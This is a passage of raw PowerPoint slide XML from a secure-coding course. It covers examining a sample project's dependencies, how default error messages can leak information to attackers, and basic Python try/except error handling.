              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Identifying Vulnerabilities </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in a Software Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{940D7646-B4F9-4B42-B2AC-D25C2F2E64E6}"/>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7"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171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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855434" y="1302040"/>
            <a:ext cx="4893287" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have explored the Woodworker Wheelhouse site's functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now you will examine the source code, looking for third-party code and other dependencies you need to research for potential vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Examining the Project Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{940D7646-B4F9-4B42-B2AC-D25C2F2E64E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5121808"/>
            <a:ext cx="1725124" cy="1630038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C4F13B4-8B94-4736-B42A-41733C17C97D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="595644" y="1600200"/>
            <a:ext cx="5936373" cy="3821540"/>
            <a:chOff x="2895600" y="2679402"/>
            <a:chExt cx="5659838" cy="3643521"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC883453-1B5D-43AA-A485-B8166413C214}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect t="59737" r="50000"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3048000" y="3025957"/>
              <a:ext cx="3167027" cy="2205519"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="112500"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="Image result for magnifying glass png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650145E7-8B17-4D1C-A60E-CE4858EA3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679402"/>
              <a:ext cx="5659838" cy="364352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4" descr="Image result for javascipt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796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CB658-DDD7-4970-852F-D1897CEB03DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Messaging (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73ECCD43-D9BE-4315-85C8-678E041B9BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="8460152" cy="5138340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default error messaging:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes such things as error messages, stack traces, database dumps, and error codes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is informative for debugging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is provided by many programming tools and components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifies problems such as null pointer exceptions, network timeouts, out of memory errors, system call failures, file not found errors, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is generally not useful to normal end users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might be very useful to an attacker, as it might provide clues regarding your application's vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your approach to error handling should ensure that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful debugging information is provided to developers within the development environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful diagnostic and monitoring information is logged for system operators.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Helpful messages are shown to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very little useful information is provided to attackers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB063877-4047-497A-B62A-295D8F97BA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2484795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CB658-DDD7-4970-852F-D1897CEB03DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Messaging (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73ECCD43-D9BE-4315-85C8-678E041B9BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="8460152" cy="5138340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even when error messages do not give details, subtle clues may be provided to an attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How the site or software operates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What data is present behind the scenes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thinking of ways an attacker might use information will help you spot potential leaks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB063877-4047-497A-B62A-295D8F97BA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BE232A-4F38-4E5A-9F42-BCDBDCDC258F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105400" y="4038600"/>
            <a:ext cx="3323196" cy="1644150"/>
            <a:chOff x="5257799" y="5213850"/>
            <a:chExt cx="3323196" cy="1644150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657D5C5D-207B-4BC2-90B7-E395E688F97D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="5257799" y="5306656"/>
              <a:ext cx="3323196" cy="1551344"/>
              <a:chOff x="5029200" y="5091965"/>
              <a:chExt cx="3783095" cy="1766035"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FBE6DB7-95D0-4206-A167-410EBBB3AA4C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5029200" y="5091965"/>
                <a:ext cx="2286001" cy="1766035"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A807C97-EBA4-4531-8367-B8DA38044E3D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="21399520">
                <a:off x="7353393" y="5145756"/>
                <a:ext cx="1458902" cy="558772"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst>
                      <a:glow rad="25400">
                        <a:schemeClr val="tx2">
                          <a:alpha val="16000"/>
                        </a:schemeClr>
                      </a:glow>
                    </a:effectLst>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Information</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst>
                      <a:glow rad="25400">
                        <a:schemeClr val="tx2">
                          <a:alpha val="16000"/>
                        </a:schemeClr>
                      </a:glow>
                    </a:effectLst>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst>
                      <a:glow rad="25400">
                        <a:schemeClr val="tx2">
                          <a:alpha val="16000"/>
                        </a:schemeClr>
                      </a:glow>
                    </a:effectLst>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>leaks</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Straight Connector 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DCF531-AFB9-45F6-B6CF-81CC337D447A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5936057" y="5213850"/>
              <a:ext cx="786333" cy="214454"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF812A"/>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4969927-7939-409B-88AB-AAFDA2978D76}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5864573" y="5852965"/>
              <a:ext cx="856146" cy="99497"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF812A"/>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C36DBC1-3370-4B73-8F5A-66042C11C507}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5258888" y="5571816"/>
              <a:ext cx="1425807" cy="70509"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF812A"/>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11304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3877-4047-497A-B62A-295D8F97BA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73ECCD43-D9BE-4315-85C8-678E041B9BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python uses try…except blocks to handle errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		x = 1/0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	except:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		print('Something went wrong.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exceptions in try block as well as called functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def this_will_fail():     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		x = 1/0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	try:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		this_will_fail() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	except Exception as e:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		print(e) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814CB658-DDD7-4970-852F-D1897CEB03DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Handling (Slide 1 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132228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3877-4047-497A-B62A-295D8F97BA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73ECCD43-D9BE-4315-85C8-678E041B9BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple Exceptions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try:     </a:t>
